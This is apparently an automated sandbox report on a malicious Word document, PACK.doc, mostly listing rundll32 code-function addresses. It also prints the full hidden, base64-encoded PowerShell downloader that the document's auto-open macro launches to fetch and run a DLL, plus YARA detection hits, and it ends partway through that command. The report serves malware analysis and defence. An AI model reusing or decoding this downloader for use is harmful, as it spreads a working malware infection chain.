                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001E9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001ED7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00222C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00233895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002302C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002342DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00234B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002363C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00222A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00224A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00237A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00235A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002262A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002280BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002248BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00221280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002312E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002288E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002326F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00221CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002320C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002296CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00238ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00237D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00232B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00237F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00235D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00238D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00231773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00225B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00239B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00232349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00238F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002269A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002217AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002373AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00236DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002361B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00239586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002331E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00233FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002367E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002371EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00231BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7F1F
                      Source: PACK.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Wm_t404p8v_, Function Document_open
                      Source: PACK.docOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll 323F6431FB274E90DC003E567C54CB5E2327E9408F903E49CC6F3E840BF9BCF6
                      Source: 00000005.00000002.2096562119.0000000000296000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2096633057.0000000001B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: O_5Z.dll.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.994955920298
                      Source: rundll32.exe, 00000006.00000002.2105059366.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100112011.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.2119718363.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.2351863247.0000000001DC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@38/8@1/2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_001F1C88 CreateToolhelp32Snapshot,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PACK.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD5A6.tmpJump to behavior
                      Source: PACK.docOLE indicator, Word Document stream: true
                      Source: PACK.docOLE document summary: title field not present or empty
                      Source: PACK.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............M........................... .W.......W.....................................#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ............M...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................H..j....................................}..v.....v......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................H..j..... ..............................}..v.....w......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................(..j....................................}..v....@.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................(..j......m.............................}..v............0...............H.m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... ..............................}..v............0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....E...............................}..v.....,......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j....E...............................}..v....@k......0.................m.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: PACK.docVirustotal: Detection: 30%
                      Source: PACK.docReversingLabs: Detection: 50%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwB